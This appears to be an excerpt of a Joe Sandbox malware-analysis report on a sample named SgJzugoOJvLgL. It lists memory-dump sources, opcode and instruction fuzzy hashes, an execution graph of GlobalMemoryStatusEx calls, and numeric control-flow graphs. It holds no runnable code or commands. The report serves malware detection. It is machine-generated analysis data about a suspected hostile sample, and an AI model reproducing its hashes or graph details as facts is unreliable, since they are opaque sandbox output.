                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b77a0fff49d6ba0c9cd8c8674d461b6c324400f6310a238d849eb1676468f70f
                                                                              • Instruction ID: 3a3363632cdc2deb947e4d91a7a39c67e6b9853bc18e223ec821ce1fdec1ade3
                                                                              • Opcode Fuzzy Hash: b77a0fff49d6ba0c9cd8c8674d461b6c324400f6310a238d849eb1676468f70f
                                                                              • Instruction Fuzzy Hash: FF2129B1554200DFDB06DF94D5C0B26BBA5FB84314F20C56DE8494B25BC7B6D446CA61
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1713171305.000000000223D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0223D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_223d000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 16be64d0aecb80126e1a0630da75922df15c5008665d689c5a2754641019b844
                                                                              • Instruction ID: 6954afc5f381233529fe90b10dcbfe6e87e7edd42c160d23f2d1475f588615bc
                                                                              • Opcode Fuzzy Hash: 16be64d0aecb80126e1a0630da75922df15c5008665d689c5a2754641019b844
                                                                              • Instruction Fuzzy Hash: 772164B0614200DFCB12DF64D9C0B26BFA5FB84B14F20C56DE80A4B25AC37BD407CA61
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1717776256.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_5680000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1633883ac413abf4801ae539a6e5cacd3792b8db5ceb09238c0c0d018cd8bfc9
                                                                              • Instruction ID: 74fa8614b4b77c45a303a43d06400da674c066b053d95438cc78c64cc4272281
                                                                              • Opcode Fuzzy Hash: 1633883ac413abf4801ae539a6e5cacd3792b8db5ceb09238c0c0d018cd8bfc9
                                                                              • Instruction Fuzzy Hash: 6E210AB0E0520ADFCB14EFA9D4446BEBBF2FB48300F2486A9D405A7354DB359986CF91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1717776256.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_5680000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5d99b8e65ff6681029aafe1fc28ba91f3aae34f907e918c564ae6bb57de3154f
                                                                              • Instruction ID: 15a6c826d416ed35f04d0e051f02b9b7c36460628849f2fbed3faef66c3f8dd7
                                                                              • Opcode Fuzzy Hash: 5d99b8e65ff6681029aafe1fc28ba91f3aae34f907e918c564ae6bb57de3154f
                                                                              • Instruction Fuzzy Hash: B62181B4E09208CFCB44EFA8D5485BEBBF2FB49310F108559D809E7355DB349A46DB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1713171305.000000000223D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0223D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_223d000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9ed7d8e9c795a52337ec8434a913e9ea3127ed10839ec4f2e4309960b529febc
                                                                              • Instruction ID: b8e2d415492eaf540c6ea18213f4283c68272080f64597b325c2d81c79795273
                                                                              • Opcode Fuzzy Hash: 9ed7d8e9c795a52337ec8434a913e9ea3127ed10839ec4f2e4309960b529febc
                                                                              • Instruction Fuzzy Hash: 672150B55083809FCB03CF64D994B11BF71EB46714F28C5DAD8498F2A7C33A985ACB62
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1717776256.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_5680000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 28ccf156f8174b99d60af7afafd16a9b54e76fced378108f73f8df8a76c34b2b
                                                                              • Instruction ID: cfbe64a41c2741cdb853a95c130df1e5777df9763d4d9ba5e9de8246db63a4ed
                                                                              • Opcode Fuzzy Hash: 28ccf156f8174b99d60af7afafd16a9b54e76fced378108f73f8df8a76c34b2b
                                                                              • Instruction Fuzzy Hash: 63117FB4E05208CFCB44EFA8D5486BEBBF6FB8D310F108569D809A3354DB309A46DB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1712530692.000000000087D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0087D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_87d000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                              • Instruction ID: cabf2991eecb52c57d485c943b12993a88b67ce4e228e53123b587f3942c3d67
                                                                              • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                              • Instruction Fuzzy Hash: E011DF72404340DFCB02CF00D5C4B16BF71FB94324F24C2A9D8094B25AC33AE85ACBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1712530692.000000000087D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0087D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_87d000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                              • Instruction ID: 51c439bc91cdcefff6026380e64ba0b196fcae5552195f07999e3aa3160da710
                                                                              • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                              • Instruction Fuzzy Hash: 1711AF76504280CFCB16CF14D5C4B16BF71FB94328F24C6A9D8494B65AC336D85ACBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1713171305.000000000223D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0223D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_223d000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                              • Instruction ID: c891b8de7165d652168bb5f203f4b9ede600e3f80b9e830abd0dc9bf2196662c
                                                                              • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                              • Instruction Fuzzy Hash: C011BBB5504280DFDB02CF50C5C4B15BBA1FB84218F24C6AAD8494B29AC37AD40ACB61
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1712530692.000000000087D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0087D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_87d000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a9040f8702c6a2dea7e99d84d3f8252e6de8df13e9e01101116bb412f167f156
                                                                              • Instruction ID: 404027bf7264774ccd99674e63b68ad3ee50cb15e31f098c00fa3aa955ee8cb6
                                                                              • Opcode Fuzzy Hash: a9040f8702c6a2dea7e99d84d3f8252e6de8df13e9e01101116bb412f167f156
                                                                              • Instruction Fuzzy Hash: 14012B310083449AE7144E29CDC4B67BFB8FF413A4F18C52AED0C8E28AD639DC40D6B1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1712530692.000000000087D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0087D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_87d000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 14daaf306ac2d438556a56733c590e4041212fcdec6e9d7150bf6759695a5646
                                                                              • Instruction ID: 956d4de73d7d8a501628b4fdee17db69393515fec32ba44447e44906e7e3dc6f
                                                                              • Opcode Fuzzy Hash: 14daaf306ac2d438556a56733c590e4041212fcdec6e9d7150bf6759695a5646
                                                                              • Instruction Fuzzy Hash: 3CF06D71408344AAE7148E1ACD88B62FFA8FF95774F18C55AED0C4A28AD2799C44DAB1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1717776256.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_5680000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 51d02e0977fc552dc64bea76b76081792fecd9bdea7eaf67101dc11afa3a44e0
                                                                              • Instruction ID: 548bd05cef2d477373e792414b0be6bfafda35a5a13fd62e201a8596e49014be
                                                                              • Opcode Fuzzy Hash: 51d02e0977fc552dc64bea76b76081792fecd9bdea7eaf67101dc11afa3a44e0
                                                                              • Instruction Fuzzy Hash: 5FF0C974D0D209EFCF44EFA9D5416BCBBF9AB49300F0091AA982AA3281EA345A45DB51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1717776256.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_5680000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4aa72190d9a0ab63a900f0d3c117440f71c683951aa515cfac8a81e6912e454d
                                                                              • Instruction ID: a4a4d1879a562c3240aaf37bd49f9e600333d1d849495b24475de1fa67064831
                                                                              • Opcode Fuzzy Hash: 4aa72190d9a0ab63a900f0d3c117440f71c683951aa515cfac8a81e6912e454d
                                                                              • Instruction Fuzzy Hash: 3CF0E534E0A2059FC341EFA4D8846ECBFF0EB49210F2044E9C809C3341EA354E47CB41
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1717776256.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_5680000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ac19b22d719599536a738555d627fa28bbd496b5ea4395421d05a088ab80a3f2
                                                                              • Instruction ID: b7179a8db4eefa51223b834b9426a0a7836cc6fa6f58f30e0e5520c41a09e4ee
                                                                              • Opcode Fuzzy Hash: ac19b22d719599536a738555d627fa28bbd496b5ea4395421d05a088ab80a3f2
                                                                              • Instruction Fuzzy Hash: 59F03070E0A248EFC790DFA8D9956ACBBF0FB49310F14C5EAD81897342DA354E4ACB41
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1717776256.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_5680000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 627dcf43410593fbb42bd83609f5d9ed173c44a9a41a9baac0823969accf35bc
                                                                              • Instruction ID: 4acc2448236768d61193c525e65008830fff44e1568529652df26e7bc867725b
                                                                              • Opcode Fuzzy Hash: 627dcf43410593fbb42bd83609f5d9ed173c44a9a41a9baac0823969accf35bc
                                                                              • Instruction Fuzzy Hash: 0EF05E34A04148CFD714EF58E594BADBBB1FB88300F1080A5D50EA7348CA30AE8ADF51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1717776256.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_5680000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a1db7bfedebd90fe5624e7c0bb0f589fa864a79ab63bfce2ffe098b0a6b8593a
                                                                              • Instruction ID: 2e6b5b2c2d8fc03b37261c311206efb3fd8895e2f13ccc03d313c5db37d75e59
                                                                              • Opcode Fuzzy Hash: a1db7bfedebd90fe5624e7c0bb0f589fa864a79ab63bfce2ffe098b0a6b8593a
                                                                              • Instruction Fuzzy Hash: ECE0E574E45208EFCB84EFA8E5406ACFBF4FB88304F10C1A99859A3340DA359A42DF81
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1717776256.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_5680000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a1db7bfedebd90fe5624e7c0bb0f589fa864a79ab63bfce2ffe098b0a6b8593a
                                                                              • Instruction ID: bfe2d88f67031c8f8908549bc852957d453cc7f0bc8d156af2bf2ffb5dc7e9b7
                                                                              • Opcode Fuzzy Hash: a1db7bfedebd90fe5624e7c0bb0f589fa864a79ab63bfce2ffe098b0a6b8593a
                                                                              • Instruction Fuzzy Hash: DBE0ED74E05208EFC784EFA8D5446ACBBF4FB48310F10C5E9981893341DA355E45DF41
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1717776256.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_5680000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3ecc9c53b3f96f580ead011036692446310cbaf45beeb4940e2116435719f49c
                                                                              • Instruction ID: 599bf237c063eef062016d7a485956550a47d00a9ae74fa6bbd64da46ec56a41
                                                                              • Opcode Fuzzy Hash: 3ecc9c53b3f96f580ead011036692446310cbaf45beeb4940e2116435719f49c
                                                                              • Instruction Fuzzy Hash: B1E06D3181B308EFDB45DF98E19D5ACBBB6FF45300F200A96E40A97150EB304945CB49
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1717776256.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_5680000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 532eb4773fd86ee13932f08d1226f7939986b87fef3c08575b1efdc1869242b9
                                                                              • Instruction ID: 662e5aa483bc7ba3893162831ce167d2f6edefcdd08a96434fe261aacabc4af1
                                                                              • Opcode Fuzzy Hash: 532eb4773fd86ee13932f08d1226f7939986b87fef3c08575b1efdc1869242b9
                                                                              • Instruction Fuzzy Hash: 64E0E674E05108DFC784EFA8D9496ACBBF4EB48614F1085E99809D3741DA319E45DB41
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1717776256.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_5680000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ee95e5a5c48413632b277e70afcf0a833b68b72a7464cfe5ba870fd7dd562368
                                                                              • Instruction ID: b99b92d736688d9acb381a478d0eb9ebf90e9c3292f09f285d56b65b8a864bcb
                                                                              • Opcode Fuzzy Hash: ee95e5a5c48413632b277e70afcf0a833b68b72a7464cfe5ba870fd7dd562368
                                                                              • Instruction Fuzzy Hash: 48E0C27094520CFBC700EFA4E6046AD7BFDEB89301F1065E5D406932A0EA769E85DB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1717776256.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_5680000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8dadfb75f25169889797cc339688123dbd4873d003eea519c800285221cf26e3
                                                                              • Instruction ID: 9d75d2be5c04bbc77578670badc63e2595c3a1b2f1af4ae6e90ad2a00af89452
                                                                              • Opcode Fuzzy Hash: 8dadfb75f25169889797cc339688123dbd4873d003eea519c800285221cf26e3
                                                                              • Instruction Fuzzy Hash: 4AE01274D1520CDFCB40EFB8E9457ACBBF4FB48201F1046A9D80993740EA705E80DB92
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1717776256.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_5680000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d34c07b01568d961cd1a7bf79352a85e65492ad0a8b0aacc6c046266d7a72c90
                                                                              • Instruction ID: 8a5265bbb964cf7896148e07d9f9b1fe425d1fb4823cc709616ca7a5706b23e5
                                                                              • Opcode Fuzzy Hash: d34c07b01568d961cd1a7bf79352a85e65492ad0a8b0aacc6c046266d7a72c90
                                                                              • Instruction Fuzzy Hash: 01B09236A87108EACA14AAD8B01D0FCF728E7DA233B026977D20AD2110863589698664
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Execution Graph

                                                                              Execution Coverage:11.2%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:51
                                                                              Total number of Limit Nodes:7
                                                                              execution_graph 24510 294fef8 24511 294ff20 24510->24511 24513 294ff90 24511->24513 24514 667fee0 24511->24514 24516 667fcb1 24514->24516 24517 667feea 24514->24517 24515 667fde2 24515->24513 24516->24515 24521 294eb10 24516->24521 24524 294eb00 24516->24524 24517->24513 24518 667fd60 24518->24513 24528 294eb39 24521->24528 24522 294eb1e 24522->24518 24525 294eb10 24524->24525 24527 294eb39 2 API calls 24525->24527 24526 294eb1e 24526->24518 24527->24526 24529 294eb55 24528->24529 24530 294eb7d 24528->24530 24529->24522 24536 294eb39 GlobalMemoryStatusEx 24530->24536 24537 294ec20 24530->24537 24531 294eb9e 24531->24522 24532 294eb9a 24532->24531 24533 294ec66 GlobalMemoryStatusEx 24532->24533 24534 294ec96 24533->24534 24534->24522 24536->24532 24538 294ec66 GlobalMemoryStatusEx 24537->24538 24539 294ec96 24538->24539 24539->24532 24540 2940848 24542 294084e 24540->24542 24541 294091b 24542->24541 24545 294148b 24542->24545 24550 2941380 24542->24550 24546 2941396 24545->24546 24547 2941480 24546->24547 24548 294148b 2 API calls 24546->24548 24556 2947eb0 24546->24556 24547->24542 24548->24546 24552 294132e 24550->24552 24553 294138b 24550->24553 24551 2941480 24551->24542 24552->24542 24553->24551 24554 2947eb0 2 API calls 24553->24554 24555 294148b 2 API calls 24553->24555 24554->24553 24555->24553 24557 2947eba 24556->24557 24558 2947ed4 24557->24558 24561 667fa40 24557->24561 24566 667fa32 24557->24566 24558->24546 24563 667fa55 24561->24563 24562 667fc6a 24562->24558 24563->24562 24564 667fc81 GlobalMemoryStatusEx GlobalMemoryStatusEx 24563->24564 24565 667fee0 GlobalMemoryStatusEx GlobalMemoryStatusEx 24563->24565 24564->24563 24565->24563 24568 667fa55 24566->24568 24567 667fc6a 24567->24558 24568->24567 24569 667fc81 GlobalMemoryStatusEx GlobalMemoryStatusEx 24568->24569 24570 667fee0 GlobalMemoryStatusEx GlobalMemoryStatusEx 24568->24570 24569->24568 24570->24568

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 128 6673058-6673079 129 667307b-667307e 128->129 130 6673084-66730a3 129->130 131 6673833-6673836 129->131 140 66730a5-66730a8 130->140 141 66730bc-66730c6 130->141 132 667385c-667385e 131->132 133 6673838-6673857 131->133 134 6673865-6673868 132->134 135 6673860 132->135 133->132 134->129 138 667386e-6673877 134->138 135->134 140->141 143 66730aa-66730ba 140->143 146 66730cc-66730db 141->146 143->146 256 66730dd call 6673886 146->256 257 66730dd call 6673888 146->257 147 66730e2-66730e4 148 66730e6-66730ec 147->148 149 66730f1-66733ce 147->149 148->138 170 6673825-6673832 149->170 171 66733d4-6673483 149->171 180 6673485-66734aa 171->180 181 66734ac 171->181 183 66734b5-66734c5 180->183 181->183 185 667380c-6673818 183->185 186 66734cb-66734ea 183->186 185->171 187 667381e 185->187 186->185 189 66734f0-66734fa 186->189 187->170 189->185 190 6673500-667350b 189->190 190->185 191 6673511-66735e7 190->191 203 66735f5-6673625 191->203 204 66735e9-66735eb 191->204 208 6673627-6673629 203->208 209 6673633-667363f 203->209 204->203 208->209 210 66736a5-66736c0 209->210 211 6673641-6673645 209->211 214 66736c6-6673702 210->214 215 66737fd-6673806 210->215 211->210 212 6673647-6673671 211->212 221 6673673-6673675 212->221 222 667367f-667369e 212->222 227 6673704-6673706 214->227 228 6673710-667371e 214->228 215->185 215->191 221->222 222->214 225 66736a0 222->225 225->215 227->228 230 6673735-6673740 228->230 231 6673720-667372b 228->231 235 6673742-6673748 230->235 236 6673758-6673769 230->236 231->230 234 667372d 231->234 234->230 237 667374c-667374e 235->237 238 667374a 235->238 240 6673781-667378d 236->240 241 667376b-6673771 236->241 237->236 238->236 245 66737a5-66737f6 240->245 246 667378f-6673795 240->246 242 6673775-6673777 241->242 243 6673773 241->243 242->240 243->240 245->215 247 6673797 246->247 248 6673799-667379b 246->248 247->245 248->245 256->147 257->147
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                              • API String ID: 0-2392861976
                                                                              • Opcode ID: 917092c74ff87c48163903842b1ec8209179e9dbc990bf8ba7c5e56e3f73e6d0
                                                                              • Instruction ID: f63762040ce910ff85e2c4974f654af3fb12c01f0277c3aa8c46d9482f80edaf
                                                                              • Opcode Fuzzy Hash: 917092c74ff87c48163903842b1ec8209179e9dbc990bf8ba7c5e56e3f73e6d0
                                                                              • Instruction Fuzzy Hash: A4322E31E1061ACBCB54EF75C95459DB7B6BFC9300F2486A9D409AB354EF30E985CB81
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 801 6677d90-6677dae 802 6677db0-6677db3 801->802 803 6677db5-6677dcf 802->803 804 6677dd4-6677dd7 802->804 803->804 805 6677dfa-6677dfd 804->805 806 6677dd9-6677df5 804->806 808 6677e14-6677e17 805->808 809 6677dff-6677e0d 805->809 806->805 810 6677e24-6677e26 808->810 811 6677e19-6677e23 808->811 817 6677e36-6677e4c 809->817 818 6677e0f 809->818 814 6677e2d-6677e30 810->814 815 6677e28 810->815 814->802 814->817 815->814 821 6678067-6678071 817->821 822 6677e52-6677e5b 817->822 818->808 823 6678072-66780a7 822->823 824 6677e61-6677e7e 822->824 827 66780a9-66780ac 823->827 831 6678054-6678061 824->831 832 6677e84-6677eac 824->832 829 66780cf-66780d2 827->829 830 66780ae-66780ca 827->830 833 667817f-6678182 829->833 834 66780d8-66780e4 829->834 830->829 831->821 831->822 832->831 855 6677eb2-6677ebb 832->855 835 66783b7-66783b9 833->835 836 6678188-6678197 833->836 841 66780ef-66780f1 834->841 839 66783c0-66783c3 835->839 840 66783bb 835->840 849 66781b6-66781fa 836->849 850 6678199-66781b4 836->850 839->827 844 66783c9-66783d2 839->844 840->839 845 66780f3-66780f9 841->845 846 6678109-667810d 841->846 852 66780fd-66780ff 845->852 853 66780fb 845->853 847 667810f-6678119 846->847 848 667811b 846->848 854 6678120-6678122 847->854 848->854 861 6678200-6678211 849->861 862 667838b-66783a1 849->862 850->849 852->846 853->846 856 6678124-6678127 854->856 857 6678139-6678172 854->857 855->823 859 6677ec1-6677edd 855->859 856->844 857->836 881 6678174-667817e 857->881 867 6677ee3-6677f0d 859->867 868 6678042-667804e 859->868 870 6678217-6678234 861->870 871 6678376-6678385 861->871 862->835 884 6677f13-6677f3b 867->884 885 6678038-667803d 867->885 868->831 868->855 870->871 883 667823a-6678330 call 6676598 870->883 871->861 871->862 934 6678332-667833c 883->934 935 667833e 883->935 884->885 891 6677f41-6677f6f 884->891 885->868 891->885 897 6677f75-6677f7e 891->897 897->885 899 6677f84-6677fb6 897->899 906 6677fc1-6677fdd 899->906 907 6677fb8-6677fbc 899->907 906->868 909 6677fdf-6678036 call 6676598 906->909 907->885 908 6677fbe 907->908 908->906 909->868 936 6678343-6678345 934->936 935->936 936->871 937 6678347-667834c 936->937 938 667834e-6678358 937->938 939 667835a 937->939 940 667835f-6678361 938->940 939->940 940->871 941 6678363-667836f 940->941 941->871
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q
                                                                              • API String ID: 0-355816377
                                                                              • Opcode ID: e8559eacbcabf36f08762059c9530ca3b3006ce31b76692260aa3d92784a1ed3
                                                                              • Instruction ID: b32bd1c11980c41335f47d5fad87bd2d743799c37b10acc3919cd9ff523b5919
                                                                              • Opcode Fuzzy Hash: e8559eacbcabf36f08762059c9530ca3b3006ce31b76692260aa3d92784a1ed3
                                                                              • Instruction Fuzzy Hash: B9029E30B0020A8FDB54DB78D594AAEB7E2EF84314F148579D40ADB395DB71EC86CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 58b28aac7aa9708ebc2b1f453c7608dcbb81dd4c023d92e390813cbf9fd8f880
                                                                              • Instruction ID: feddaa80265dffc1f56fa6faeacdfb25fd0846ba71a9c9fa64fbd92961476a35
                                                                              • Opcode Fuzzy Hash: 58b28aac7aa9708ebc2b1f453c7608dcbb81dd4c023d92e390813cbf9fd8f880
                                                                              • Instruction Fuzzy Hash: 56924434E00204CFDB64DB68C594A6DBBF6FB88314F5484AAD449AB365DB35EE85CF80
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

